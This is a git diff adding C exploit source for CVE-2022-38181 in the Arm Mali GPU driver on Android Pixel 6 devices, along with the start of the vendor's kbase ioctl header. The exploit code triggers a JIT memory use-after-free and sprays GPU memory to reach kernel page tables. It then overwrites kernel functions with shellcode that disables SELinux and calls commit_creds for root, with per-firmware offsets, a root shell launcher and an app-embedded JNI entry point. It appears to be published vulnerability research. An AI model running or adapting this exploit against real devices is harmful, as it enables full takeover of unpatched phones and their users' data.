+void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results) {
+ struct kbase_ioctl_mem_flags_change change = {0};
+ change.flags = flags;
+ change.gpu_va = gpu_addr;
+ change.mask = flags;
+ if (ignore_results) {
+ ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change);
+ return;
+ }
+ if (ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change) < 0) {
+ err(1, "flags_change failed\n");
+ }
+}
+
+void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) {
+ if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) {
+ err(1, "mem_alloc failed\n");
+ }
+}
+
+void mem_alias(int fd, union kbase_ioctl_mem_alias* alias) {
+ if (ioctl(fd, KBASE_IOCTL_MEM_ALIAS, alias) < 0) {
+ err(1, "mem_alias failed\n");
+ }
+}
+
+void mem_query(int fd, union kbase_ioctl_mem_query* query) {
+ if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) {
+ err(1, "mem_query failed\n");
+ }
+}
+
+void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) {
+ struct kbase_ioctl_mem_commit commit = {.gpu_addr = gpu_addr, pages = pages};
+ if (ioctl(fd, KBASE_IOCTL_MEM_COMMIT, &commit) < 0) {
+ err(1, "mem_commit failed\n");
+ }
+}
+
+void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22);
+ int prot = PROT_READ;
+ if (!read_only) {
+ alloc.in.flags |= BASE_MEM_PROT_GPU_WR;
+ prot |= PROT_WRITE;
+ }
+ alloc.in.va_pages = va_pages;
+ alloc.in.commit_pages = commit_pages;
+ mem_alloc(mali_fd, &alloc);
+ void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va);
+ if (region == MAP_FAILED) {
+ err(1, "mmap failed");
+ }
+ return region;
+}
+
+uint64_t alloc_mem(int mali_fd, unsigned int pages) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
+ int prot = PROT_READ | PROT_WRITE;
+ alloc.in.va_pages = pages;
+ alloc.in.commit_pages = pages;
+ mem_alloc(mali_fd, &alloc);
+ return alloc.out.gpu_va;
+}
+
+void free_mem(int mali_fd, uint64_t gpuaddr) {
+ struct kbase_ioctl_mem_free mem_free = {.gpu_addr = gpuaddr};
+ if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) {
+ err(1, "free_mem failed\n");
+ }
+}
+
+uint64_t drain_mem_pool(int mali_fd) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
+ int prot = PROT_READ | PROT_WRITE;
+ alloc.in.va_pages = POOL_SIZE;
+ alloc.in.commit_pages = POOL_SIZE;
+ mem_alloc(mali_fd, &alloc);
+ return alloc.out.gpu_va;
+}
+
+void release_mem_pool(int mali_fd, uint64_t drain) {
+ struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain};
+ if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) {
+ err(1, "free_mem failed\n");
+ }
+}
+
+#define CPU_SETSIZE 1024
+#define __NCPUBITS (8 * sizeof (unsigned long))
+typedef struct
+{
+ unsigned long __bits[CPU_SETSIZE / __NCPUBITS];
+} cpu_set_t;
+
+#define CPU_SET(cpu, cpusetp) \
+ ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS)))
+#define CPU_ZERO(cpusetp) \
+ memset((cpusetp), 0, sizeof(cpu_set_t))
+
+int migrate_to_cpu(int i)
+{
+ int syscallres;
+ pid_t pid = gettid();
+ cpu_set_t cpu;
+ CPU_ZERO(&cpu);
+ CPU_SET(i, &cpu);
+
+ syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu);
+ if (syscallres)
+ {
+ return -1;
+ }
+ return 0;
+}
+
+void* flush(int spray_cpu, int idx) {
+ migrate_to_cpu(spray_cpu);
+ void* region = mmap(NULL, FLUSH_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+ if (region == MAP_FAILED) err(1, "flush failed");
+ memset(region, idx, FLUSH_SIZE);
+ return region;
+}
+
+void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
+ for (int i = 0; i < nents; i++) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
+ int prot = PROT_READ | PROT_WRITE;
+ alloc.in.va_pages = pages;
+ alloc.in.commit_pages = pages;
+ mem_alloc(mali_fd, &alloc);
+ reserved_va[i] = alloc.out.gpu_va;
+ }
+}
+
+void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
+ for (int i = 0; i < nents; i++) {
+ void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]);
+ if (reserved == MAP_FAILED) {
+ err(1, "mmap reserved failed");
+ }
+ reserved_va[i] = (uint64_t)reserved;
+ }
+}
+
+uint64_t alias_sprayed_regions(int mali_fd) {
+ union kbase_ioctl_mem_alias alias = {0};
+ alias.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
+ alias.in.stride = SPRAY_PAGES;
+
+ alias.in.nents = SPRAY_NUM;
+ struct base_mem_aliasing_info ai[SPRAY_NUM];
+ for (int i = 0; i < SPRAY_NUM; i++) {
+ ai[i].handle.basep.handle = gpu_va[i];
+ ai[i].length = SPRAY_PAGES;
+ ai[i].offset = 0;
+ }
+ alias.in.aliasing_info = (uint64_t)(&(ai[0]));
+ mem_alias(mali_fd, &alias);
+ uint64_t region_size = 0x1000 * SPRAY_NUM * SPRAY_PAGES;
+ void* region = mmap(NULL, region_size, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va);
+ if (region == MAP_FAILED) {
+ err(1, "mmap alias failed");
+ }
+ alias_regions[0] = region;
+ for (int i = 1; i < SPRAY_NUM; i++) {
+ void* this_region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ, MAP_SHARED, mali_fd, (uint64_t)region + i * 0x1000 * SPRAY_PAGES);
+ if (this_region == MAP_FAILED) {
+ err(1, "mmap alias failed %d\n", i);
+ }
+ alias_regions[i] = this_region;
+ }
+ return (uint64_t)region;
+}
+
+void fault_pages() {
+ int read = 0;
+ for (int va = 0; va < SPRAY_NUM; va++) {
+ uint8_t* this_va = (uint8_t*)(gpu_va[va]);
+ *this_va = 0;
+ uint8_t* this_alias = alias_regions[va];
+ read += *this_alias;
+ }
+ LOG("read %d\n", read);
+}
+
+int find_freed_idx(int mali_fd) {
+ int freed_idx = -1;
+ for (int j = 0; j < SPRAY_NUM; j++) {
+ union kbase_ioctl_mem_query query = {0};
+ query.in.gpu_addr = gpu_va[j];
+ query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE;
+ ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query);
+ if (query.out.value != SPRAY_PAGES) {
+ LOG("jit_free commit: %d %llu\n", j, query.out.value);
+ freed_idx = j;
+ }
+ }
+ return freed_idx;
+}
+
+int find_pgd(int freed_idx, int start_pg) {
+ uint64_t* this_alias = alias_regions[freed_idx];
+ for (int pg = start_pg; pg < SPRAY_PAGES; pg++) {
+ for (int i = 0; i < 0x1000/8; i++) {
+ uint64_t entry = this_alias[pg * 0x1000/8 + i];
+ if ((entry & 0x443) == 0x443) {
+ return pg;
+ }
+ }
+ }
+ return -1;
+}
+
+uint32_t lo32(uint64_t x) {
+ return x & 0xffffffff;
+}
+
+uint32_t hi32(uint64_t x) {
+ return x >> 32;
+}
+
+uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
+ uint64_t pc_page = pc >> 12;
+ uint64_t label_page = label >> 12;
+ int64_t offset = (label_page - pc_page) << 12;
+ int64_t immhi_mask = 0xffffe0;
+ int64_t immhi = offset >> 14;
+ int32_t immlo = (offset >> 12) & 0x3;
+ uint32_t adpr = rd & 0x1f;
+ adpr |= (1 << 28);
+ adpr |= (1 << 31); //op
+ adpr |= immlo << 29;
+ adpr |= (immhi_mask & (immhi << 5));
+ return adpr;
+}
+
+void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) {
+
+ uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
+ //Sets x0 to init_cred
+ root_code[ADRP_INIT_INDEX] = init_adpr;
+ root_code[ADD_INIT_INDEX] = add_init;
+ //Sets x8 to commit_creds
+ root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred);
+ root_code[ADD_COMMIT_INDEX] = add_commit;
+ root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
+ root_code[5] = 0xd63f0100; // blr x8
+ root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
+ root_code[7] = 0xd65f03c0; // ret
+}
+
+uint64_t set_addr_lv3(uint64_t addr) {
+ uint64_t pfn = addr >> PAGE_SHIFT;
+ pfn &= ~ 0x1FFUL;
+ pfn |= 0x100UL;
+ return pfn << PAGE_SHIFT;
+}
+
+static inline uint64_t compute_pt_index(uint64_t addr, int level) {
+ uint64_t vpfn = addr >> PAGE_SHIFT;
+ vpfn >>= (3 - level) * 9;
+ return vpfn & 0x1FF;
+}
+
+void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) {
+ void* jc_region = map_gpu(mali_fd, 1, 1, false, 0);
+ struct MALI_JOB_HEADER jh = {0};
+ jh.is_64b = true;
+ jh.type = MALI_JOB_TYPE_WRITE_VALUE;
+
+ struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
+ payload.type = type;
+ payload.immediate_value = value;
+ payload.address = gpu_addr;
+
+ MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh);
+ MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload);
+ uint32_t* section = (uint32_t*)jc_region;
+ struct base_jd_atom_v2 atom = {0};
+ atom.jc = (uint64_t)jc_region;
+ atom.atom_number = atom_number;
+ atom.core_req = BASE_JD_REQ_CS;
+ struct kbase_ioctl_job_submit submit = {0};
+ submit.addr = (uint64_t)(&atom);
+ submit.nr_atoms = 1;
+ submit.stride = sizeof(struct base_jd_atom_v2);
+ if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+ err(1, "submit job failed\n");
+ }
+ usleep(10000);
+}
+
+void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
+ uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
+ uint64_t curr_overwrite_addr = 0;
+ for (int i = 0; i < size; i++) {
+ uint64_t base = reserved[i];
+ uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000;
+ uint64_t start_idx = compute_pt_index(base, 3);
+ uint64_t end_idx = compute_pt_index(end, 3);
+ for (uint64_t addr = base; addr < end; addr += 0x1000) {
+ uint64_t overwrite_addr = set_addr_lv3(addr);
+ if (curr_overwrite_addr != overwrite_addr) {
+ LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset);
+ curr_overwrite_addr = overwrite_addr;
+ for (int code = code_size - 1; code >= 0; code--) {
+ write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
+ }
+ usleep(300000);
+ }
+ }
+ }
+}
+
+int run_enforce() {
+ char result = '2';
+ sleep(3);
+ int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY);
+ read(enforce_fd, &result, 1);
+ close(enforce_fd);
+ LOG("result %d\n", result);
+ return result;
+}
+
+void select_offset() {
+ char fingerprint[256];
+ int len = __system_property_get("ro.build.fingerprint", fingerprint);
+ LOG("fingerprint: %s\n", fingerprint);
+ if (!strcmp(fingerprint, "google/oriole/oriole:12/SD1A.210817.037/7862242:user/release-keys")) {
+ avc_deny = AVC_DENY_2108;
+ sel_read_enforce = SEL_READ_ENFORCE_2108;
+ fixup_root_shell(INIT_CRED_2108, COMMIT_CREDS_2108, SEL_READ_ENFORCE_2108, ADD_INIT_2108, ADD_COMMIT_2108);
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220105.007/8030436:user/release-keys")) {
+ avc_deny = AVC_DENY_2201;
+ sel_read_enforce = SEL_READ_ENFORCE_2201;
+ fixup_root_shell(INIT_CRED_2201, COMMIT_CREDS_2201, SEL_READ_ENFORCE_2201, ADD_INIT_2201, ADD_COMMIT_2201);
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys")) {
+ avc_deny = AVC_DENY_2202;
+ sel_read_enforce = SEL_READ_ENFORCE_2202;
+ fixup_root_shell(INIT_CRED_2202, COMMIT_CREDS_2202, SEL_READ_ENFORCE_2202, ADD_INIT_2202, ADD_COMMIT_2202);
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ3A.220705.003/8671607:user/release-keys")) {
+ avc_deny = AVC_DENY_2207;
+ sel_read_enforce = SEL_READ_ENFORCE_2207;
+ fixup_root_shell(INIT_CRED_2207, COMMIT_CREDS_2207, SEL_READ_ENFORCE_2207, ADD_INIT_2207, ADD_COMMIT_2207);
+ return;
+ }
+
+ err(1, "unable to match build id\n");
+}
+
+void cleanup(int mali_fd, uint64_t pgd) {
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), 2, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+}
+
+void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
+ uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+ usleep(100000);
+ //Go through the reserve pages addresses to write to avc_denied with our own shellcode
+ write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));
+
+ //Triggers avc_denied to disable SELinux
+ open("/dev/kmsg", O_RDONLY);
+
+ uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+ //Call commit_creds to overwrite process credentials to gain root
+ write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
+}
+
+void spray(int mali_fd) {
+ uint64_t cookies[32] = {0};
+ for (int j = 0; j < 32; j++) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (1 << 22);
+ alloc.in.va_pages = SPRAY_PAGES;
+ alloc.in.commit_pages = 0;
+ mem_alloc(mali_fd, &alloc);
+ cookies[j] = alloc.out.gpu_va;
+ }
+ for (int j = 0; j < 32; j++) {
+ void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookies[j]);
+ if (region == MAP_FAILED) {
+ err(1, "mmap failed");
+ }
+ gpu_va[j] = (uint64_t)region;
+ }
+ for (int j = 32; j < 64; j++) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (1 << 22);
+ alloc.in.va_pages = SPRAY_PAGES;
+ alloc.in.commit_pages = 0;
+ mem_alloc(mali_fd, &alloc);
+ cookies[j - 32] = alloc.out.gpu_va;
+ }
+ for (int j = 32; j < 64; j++) {
+ void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookies[j - 32]);
+ if (region == MAP_FAILED) {
+ err(1, "mmap failed");
+ }
+ gpu_va[j] = (uint64_t)region;
+ }
+}
+
+int trigger(int mali_fd, int mali_fd2, int* flush_idx) {
+ if (*flush_idx + NUM_TRIALS > FLUSH_REGION_SIZE) {
+ err(1, "Out of memory.");
+ }
+ void* gpu_alloc_addr = map_gpu(mali_fd, 1, 1, false, 0);
+
+ uint64_t jit_pages = SPRAY_PAGES;
+ uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, jit_pages, (uint64_t)gpu_alloc_addr);
+ atom_number++;
+ mem_flags_change(mali_fd, (uint64_t)jit_addr, BASE_MEM_DONT_NEED, 0);
+ for (int i = 0; i < NUM_TRIALS; i++) {
+ union kbase_ioctl_mem_query query = {0};
+ query.in.gpu_addr = jit_addr;
+ query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE;
+ flush_regions[i] = flush(SPRAY_CPU, i + *flush_idx);
+ if (ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query) < 0) {
+ migrate_to_cpu(SPRAY_CPU);
+ spray(mali_fd);
+ for (int j = 0; j < SPRAY_NUM; j++) {
+ mem_commit(mali_fd, gpu_va[j], SPRAY_PAGES);
+ }
+ LOG("region freed %d\n", i);
+
+ uint64_t alias_region = alias_sprayed_regions(mali_fd);
+ fault_pages();
+ LOG("cleanup flush region\n");
+ for (int r = 0; r < FLUSH_REGION_SIZE; r++) munmap(flush_regions[r], FLUSH_SIZE);
+
+ uint64_t drain = drain_mem_pool(mali_fd);
+ release_mem_pool(mali_fd, drain);
+
+ jit_free(mali_fd, atom_number, jit_id);
+
+ map_reserved(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+ LOG("jit_freed\n");
+ int freed_idx = find_freed_idx(mali_fd);
+ if (freed_idx == -1) err(1, "Failed to find freed_idx");
+ LOG("Found freed_idx %d\n", freed_idx);
+ int pgd_idx = find_pgd(freed_idx, 0);
+ if (pgd_idx == -1) err(1, "Failed to find pgd");
+ uint64_t pgd = alias_region + pgd_idx * 0x1000 + freed_idx * (SPRAY_PAGES * 0x1000);
+ LOG("Found pgd %d, %lx\n", pgd_idx, pgd);
+ atom_number++;
+ write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));
+ run_enforce();
+ cleanup(mali_fd, pgd);
+ return 0;
+ }
+ }
+ LOG("failed, retry.\n");
+ jit_id++;
+ *flush_idx += NUM_TRIALS;
+ return -1;
+}
+
+#ifdef SHELL
+
+int main() {
+ setbuf(stdout, NULL);
+ setbuf(stderr, NULL);
+
+ select_offset();
+ int mali_fd = open_dev(MALI);
+
+ setup_mali(mali_fd, 0);
+
+ void* tracking_page = setup_tracking_page(mali_fd);
+ jit_init(mali_fd, 0x1000, 100, 0);
+
+ int mali_fd2 = open_dev(MALI);
+ setup_mali(mali_fd2, 1);
+ setup_tracking_page(mali_fd2);
+ reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+ int flush_idx = 0;
+ for (int i = 0; i < 10; i++) {
+ if(!trigger(mali_fd, mali_fd2, &flush_idx)) {
+ system("sh");
+ break;
+ }
+ }
+}
+#else
+#include
+JNIEXPORT int JNICALL
+Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thiz)
+{
+ setbuf(stdout, NULL);
+ setbuf(stderr, NULL);
+ sleep(10);
+
+ select_offset();
+ int mali_fd = open_dev(MALI);
+
+ setup_mali(mali_fd, 0);
+
+ void* tracking_page = setup_tracking_page(mali_fd);
+ jit_init(mali_fd, 0x1000, 100, 0);
+
+ int mali_fd2 = open_dev(MALI);
+ setup_mali(mali_fd2, 1);
+ setup_tracking_page(mali_fd2);
+ reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+ int flush_idx = 0;
+ for (int i = 0; i < 10; i++) {
+ if(!trigger(mali_fd, mali_fd2, &flush_idx)) {
+ LOG("uid: %d euid %d", getuid(), geteuid());
+ return 0;
+ }
+ }
+ return -1;
+}
+#endif
diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/mali.h b/SecurityExploits/Android/Mali/CVE_2022_38181/mali.h
new file mode 100644
index 0000000..3b61e20
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_38181/mali.h
@@ -0,0 +1,1060 @@
+/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+/*
+ *
+ * (C) COPYRIGHT 2020-2021 ARM Limited. All rights reserved.
+ *
+ * This program is free software and is provided to you under the terms of the
+ * GNU General Public License version 2 as published by the Free Software
+ * Foundation, and any use by you of this program is subject to the terms
+ * of such GNU license.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, you can access it online at
+ * http://www.gnu.org/licenses/gpl-2.0.html.
+ *
+ */
+
+#ifndef _UAPI_KBASE_JM_IOCTL_H_
+#define _UAPI_KBASE_JM_IOCTL_H_
+
+#include
+#include
+
+/*
+ * 11.1:
+ * - Add BASE_MEM_TILER_ALIGN_TOP under base_mem_alloc_flags
+ * 11.2:
+ * - KBASE_MEM_QUERY_FLAGS can return KBASE_REG_PF_GROW and KBASE_REG_PROTECTED,
+ * which some user-side clients prior to 11.2 might fault if they received
+ * them
+ * 11.3:
+ * - New ioctls KBASE_IOCTL_STICKY_RESOURCE_MAP and
+ * KBASE_IOCTL_STICKY_RESOURCE_UNMAP
+ * 11.4:
+ * - New ioctl KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET
+ * 11.5:
+ * - New ioctl: KBASE_IOCTL_MEM_JIT_INIT (old ioctl renamed to _OLD)
+ * 11.6:
+ * - Added flags field to base_jit_alloc_info structure, which can be used to
+ * specify pseudo chunked tiler alignment for JIT allocations.
+ * 11.7:
+ * - Removed UMP support
+ * 11.8:
+ * - Added BASE_MEM_UNCACHED_GPU under base_mem_alloc_flags
+ * 11.9:
+ * - Added BASE_MEM_PERMANENT_KERNEL_MAPPING and BASE_MEM_FLAGS_KERNEL_ONLY
+ * under base_mem_alloc_flags
+ * 11.10:
+ * - Enabled the use of nr_extres field of base_jd_atom_v2 structure for
+ * JIT_ALLOC and JIT_FREE type softjobs to enable multiple JIT allocations
+ * with one softjob.
+ * 11.11:
+ * - Added BASE_MEM_GPU_VA_SAME_4GB_PAGE under base_mem_alloc_flags
+ * 11.12:
+ * - Removed ioctl: KBASE_IOCTL_GET_PROFILING_CONTROLS
+ * 11.13:
+ * - New ioctl: KBASE_IOCTL_MEM_EXEC_INIT
+ * 11.14:
+ * - Add BASE_MEM_GROUP_ID_MASK, base_mem_group_id_get, base_mem_group_id_set
+ * under base_mem_alloc_flags
+ * 11.15:
+ * - Added BASEP_CONTEXT_MMU_GROUP_ID_MASK under base_context_create_flags.
+ * - Require KBASE_IOCTL_SET_FLAGS before BASE_MEM_MAP_TRACKING_HANDLE can be
+ * passed to mmap().
+ * 11.16:
+ * - Extended ioctl KBASE_IOCTL_MEM_SYNC to accept imported dma-buf.
+ * - Modified (backwards compatible) ioctl KBASE_IOCTL_MEM_IMPORT behavior for
+ * dma-buf. Now, buffers are mapped on GPU when first imported, no longer
+ * requiring external resource or sticky resource tracking. UNLESS,
+ * CONFIG_MALI_DMA_BUF_MAP_ON_DEMAND is enabled.
+ * 11.17:
+ * - Added BASE_JD_REQ_JOB_SLOT.
+ * - Reused padding field in base_jd_atom_v2 to pass job slot number.
+ * - New ioctl: KBASE_IOCTL_GET_CPU_GPU_TIMEINFO
+ * 11.18:
+ * - Added BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP under base_mem_alloc_flags
+ * 11.19:
+ * - Extended base_jd_atom_v2 to allow a renderpass ID to be specified.
+ * 11.20:
+ * - Added new phys_pages member to kbase_ioctl_mem_jit_init for
+ * KBASE_IOCTL_MEM_JIT_INIT, previous variants of this renamed to use _10_2
+ * (replacing '_OLD') and _11_5 suffixes
+ * - Replaced compat_core_req (deprecated in 10.3) with jit_id[2] in
+ * base_jd_atom_v2. It must currently be initialized to zero.
+ * - Added heap_info_gpu_addr to base_jit_alloc_info, and
+ * BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE allowable in base_jit_alloc_info's
+ * flags member. Previous variants of this structure are kept and given _10_2
+ * and _11_5 suffixes.
+ * - The above changes are checked for safe values in usual builds
+ * 11.21:
+ * - v2.0 of mali_trace debugfs file, which now versions the file separately
+ * 11.22:
+ * - Added base_jd_atom (v3), which is seq_nr + base_jd_atom_v2.
+ * KBASE_IOCTL_JOB_SUBMIT supports both in parallel.
+ * 11.23:
+ * - Modified KBASE_IOCTL_MEM_COMMIT behavior to reject requests to modify
+ * the physical memory backing of JIT allocations. This was not supposed
+ * to be a valid use case, but it was allowed by the previous implementation.
+ * 11.24:
+ * - Added a sysfs file 'serialize_jobs' inside a new sub-directory
+ * 'scheduling'.
+ * 11.25:
+ * - Enabled JIT pressure limit in base/kbase by default
+ * 11.26
+ * - Added kinstr_jm API
+ * 11.27
+ * - Backwards compatible extension to HWC ioctl.
+ * 11.28:
+ * - Added kernel side cache ops needed hint
+ * 11.29:
+ * - Reserve ioctl 52
+ * 11.30:
+ * - Add a new priority level BASE_JD_PRIO_REALTIME
+ * - Add ioctl 54: This controls the priority setting.
+ * 11.31:
+ * - Added BASE_JD_REQ_LIMITED_CORE_MASK.
+ * - Added ioctl 55: set_limited_core_count.
+ */
+#define BASE_UK_VERSION_MAJOR 11
+#define BASE_UK_VERSION_MINOR 31
+
+/**
+ * struct kbase_ioctl_version_check - Check version compatibility between
+ * kernel and userspace
+ *
+ * @major: Major version number
+ * @minor: Minor version number
+ */
+struct kbase_ioctl_version_check {
+ __u16 major;
+ __u16 minor;
+};
+
+#define KBASE_IOCTL_VERSION_CHECK \
+ _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check)
+
+
+/**
+ * struct kbase_ioctl_job_submit - Submit jobs/atoms to the kernel
+ *
+ * @addr: Memory address of an array of struct base_jd_atom_v2 or v3
+ * @nr_atoms: Number of entries in the array
+ * @stride: sizeof(struct base_jd_atom_v2) or sizeof(struct base_jd_atom)
+ */
+struct kbase_ioctl_job_submit {
+ __u64 addr;
+ __u32 nr_atoms;
+ __u32 stride;
+};
+
+#define KBASE_IOCTL_JOB_SUBMIT \
+ _IOW(KBASE_IOCTL_TYPE, 2, struct kbase_ioctl_job_submit)
+
+#define KBASE_IOCTL_POST_TERM \
+ _IO(KBASE_IOCTL_TYPE, 4)
+
+/**
+ * struct kbase_ioctl_soft_event_update - Update the status of a soft-event
+ * @event: GPU address of the event which has been updated
+ * @new_status: The new status to set
+ * @flags: Flags for future expansion
+ */
+struct kbase_ioctl_soft_event_update {
+ __u64 event;
+ __u32 new_status;
+ __u32 flags;
+};
+
+#define KBASE_IOCTL_SOFT_EVENT_UPDATE \
+ _IOW(KBASE_IOCTL_TYPE, 28, struct kbase_ioctl_soft_event_update)
+
+/**
+ * struct kbase_kinstr_jm_fd_out - Explains the compatibility information for
+ * the `struct kbase_kinstr_jm_atom_state_change` structure returned from the
+ * kernel
+ *
+ * @size: The size of the `struct kbase_kinstr_jm_atom_state_change`
+ * @version: Represents a breaking change in the
+ * `struct kbase_kinstr_jm_atom_state_change`
+ * @padding: Explicit padding to get the structure up to 64bits. See
+ * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst
+ *
+ * The `struct kbase_kinstr_jm_atom_state_change` may have extra members at the
+ * end of the structure that older user space might not understand. If the
+ * `version` is the same, the structure is still compatible with newer kernels.
+ * The `size` can be used to cast the opaque memory returned from the kernel.
+ */
+struct kbase_kinstr_jm_fd_out {
+ __u16 size;
+ __u8 version;
+ __u8 padding[5];
+};
+
+/**
+ * struct kbase_kinstr_jm_fd_in - Options when creating the file descriptor
+ *
+ * @count: Number of atom states that can be stored in the kernel circular
+ * buffer. Must be a power of two
+ * @padding: Explicit padding to get the structure up to 64bits. See
+ * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst
+ */
+struct kbase_kinstr_jm_fd_in {
+ __u16 count;
+ __u8 padding[6];
+};
+
+union kbase_kinstr_jm_fd {
+ struct kbase_kinstr_jm_fd_in in;
